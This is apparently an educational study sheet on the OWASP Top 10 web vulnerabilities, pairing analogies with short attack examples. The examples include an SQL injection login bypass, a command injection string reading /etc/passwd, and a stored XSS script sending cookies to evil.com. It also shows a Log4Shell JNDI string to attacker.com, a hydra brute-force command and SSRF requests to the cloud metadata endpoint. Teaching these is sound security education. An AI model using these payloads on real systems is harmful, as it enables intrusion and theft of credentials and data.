// all 10 vulnerabilities · analogies · attack examples · interview q's
Imagine a hotel where every room uses the same key. Room 101 could open Room 505 just by changing the room number on the keycard. The front desk (server) trusts what the keycard says without verifying if that guest is actually allowed in that room.
# You're logged in as user 42. Your invoice URL is:
GET /api/invoices/1042
# You change the ID — no authorization check on server:
GET /api/invoices/1043 → 200 OK — you just read someone else's invoice
# Horizontal priv esc: same role, different user
# Vertical priv esc: user accesses admin endpoint
GET /admin/deleteUser?id=99 → Works if auth not enforced server-sideSending your credit card number on a postcard instead of a sealed envelope. Anyone who handles that postcard — the mailman, sorting facility — can read it. HTTPS is the sealed, tamper-evident envelope.
# Passwords stored with MD5 (broken)
DB: user_password = "5f4dcc3b5aa765d61d8327deb882cf99"
→ Instantly cracked: "password" (rainbow tables)
# HTTP site transmitting session token
GET http://bank.com/dashboard
Cookie: session=abc123
→ Sniffed on public WiFi via Wireshark / mitmproxy
# Weak TLS: site supports SSLv3 / TLS 1.0
→ POODLE / BEAST attack possibleImagine a secretary who types up whatever you say into official memos. You say: "Write a memo saying: fire John. Also, fire the entire finance department." The secretary, blindly following instructions, sends both memos. The app is the secretary — it needs to check if the input is a legitimate instruction, not just follow it blindly.
# Vulnerable SQL query
SELECT * FROM users WHERE username='$input' AND password='$pass'
# Attacker enters: ' OR '1'='1
SELECT * FROM users WHERE username='' OR '1'='1' AND password=''
→ Always true. Bypasses login entirely.
# Command injection via ping field
Input: 8.8.8.8; cat /etc/passwd
ping 8.8.8.8; cat /etc/passwd
→ Server executes both commands
# Stored XSS in comment field
<script>document.location='https://evil.com/steal?c='+document.cookie</script>
→ Every visitor's session cookie gets stolenA bank designs a vault where you can make unlimited "test withdrawals" that don't count until you hit confirm — but never implemented confirmation. The flaw isn't a bug in the code; it's that nobody asked "what if someone spams the test button?" during design phase.
# Business logic flaw: negative quantities
POST /cart
{ "item": "laptop", "qty": -1, "price": 999 }
→ App refunds $999 to your account (no validation on negative qty)
# Password reset with no rate limit or account lockout
→ Attacker brute-forces 6-digit OTP (1,000,000 combos)
→ Design flaw: should expire after 5 attempts
# Credential stuffing because no MFA was designed in
→ 10M leaked username/passwords → automated login attemptsMoving into a new house and never changing the locks that came with it. The builder, every contractor, and the previous owner all have a copy. "It worked out of the box" doesn't mean it's secure — default = known to everyone.
# Default credentials (very common)
admin:admin, admin:password, root:root
→ Jenkins, Tomcat, routers exposed to internet
# AWS S3 bucket public read (Capital One breach 2019)
curl https://s3.amazonaws.com/company-internal-docs/
→ 100M customer records exposed
# Stack trace leaking in error response
500 Internal Server Error:
NullPointerException at DatabaseHelper.java:42
Connection string: jdbc:mysql://prod-db:3306/users
→ Attacker now knows DB type, host, and port
# Directory listing enabled
GET /backup/ → shows: db_backup_2024.sql, config.envYour car has a recalled brake system — the manufacturer sent a fix months ago, but you never applied it. You're not driving an "unpatched car" deliberately, you just never checked. The vulnerability is public knowledge, the exploit is a manual, and you're the one at risk.
# Log4Shell (CVE-2021-44228) — Dec 2021
# Log4j logs user-agent string — attacker sends:
User-Agent: ${jndi:ldap://attacker.com/exploit}
→ Server fetches and executes attacker's Java class
→ RCE on millions of servers in 72 hours
# Checking for outdated packages
npm audit # Node.js
pip-audit # Python
nmap --script vuln # Service version + CVE check
# EternalBlue (MS17-010) — WannaCry
→ Unpatched Windows SMB → ransomware epidemicA nightclub that checks ID but accepts a Post-It note with "YES IM 21" written on it. Or one that lets you back in with the same wristband after leaving — even if you lent it to a friend. The bouncer (authentication) trusted the wrong signals.
# Credential stuffing with leaked passwords
hydra -L users.txt -P rockyou.txt https://target.com/login
→ 0.5% success rate × 1M accounts = 5,000 compromised
# Session token never expires or rotates after login
Cookie: session=abc123
→ Steal the token → replay it for weeks
# Predictable session token
session_20240101_user42
→ Attacker guesses other users' tokens
# No rate limiting on password reset OTP
→ Brute force 6-digit code in minutesA restaurant that receives sealed ingredient boxes from a supplier — but never checks if the seal has been tampered with. The attacker intercepts the delivery, replaces the chicken with something toxic, reseals the box, and the kitchen blindly cooks it. The food (data/code) was never verified to be what it claimed.
# Insecure deserialization (Java)
# App deserializes base64 cookie without validation
Cookie: user=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==
→ Attacker crafts malicious serialized object → RCE
→ Tool: ysoserial.jar
# SolarWinds (2020) supply chain attack
→ Attackers compromised the BUILD server
→ Malicious code injected into legitimate signed update
→ 18,000+ orgs downloaded the backdoored update
# npm package hijack
→ Attacker publishes typosquatted "lodahs" (not "lodash")
→ Developer typos → malicious code runs in CI/CDA bank with no security cameras, no alarm triggers, no incident log. A thief breaks in at 2am, drills the vault slowly for 6 hours, leaves. Nobody knows until a teller notices cash is missing 3 weeks later. The crime happened — the failure is that nobody was watching, and the evidence was never recorded.
# What an attacker loves: no logs
→ 50,000 failed login attempts → no alert triggered
→ Attacker pivots from web app to internal network
→ Exfiltrates 10GB over 3 weeks → no anomaly detected
# Equifax breach (2017)
→ Attackers active for 78 days undetected
→ 143M records exfiltrated
→ SSL inspection disabled → encrypted exfiltration missed
# What good logs look like
2024-01-15 02:31:44 [WARN] Failed login user:admin ip:45.33.32.156
2024-01-15 02:31:45 [WARN] Failed login user:admin ip:45.33.32.156
2024-01-15 02:31:45 [ALERT] Brute force detected — blocking IPYou can't enter a restricted government building, but you have a friend who works there. You hand your friend a letter and say "can you go ask the records room for file #4521 and bring it back to me?" Your friend (the server) fetches it on your behalf, bypassing all the security checks you would have faced at the front door.
# App accepts a URL and fetches it server-side
POST /api/preview
{ "url": "https://legitimate-site.com" }
# Attacker points it to cloud metadata API
{ "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" }
→ Returns AWS IAM credentials — full cloud account takeover
# Internal service enumeration
{ "url": "http://internal-db:5432" } → Port scan internal network
{ "url": "http://redis:6379" } → Access internal Redis cache
# Capital One 2019: WAF misconfigured + SSRF
→ 100M+ customer records stolen via metadata API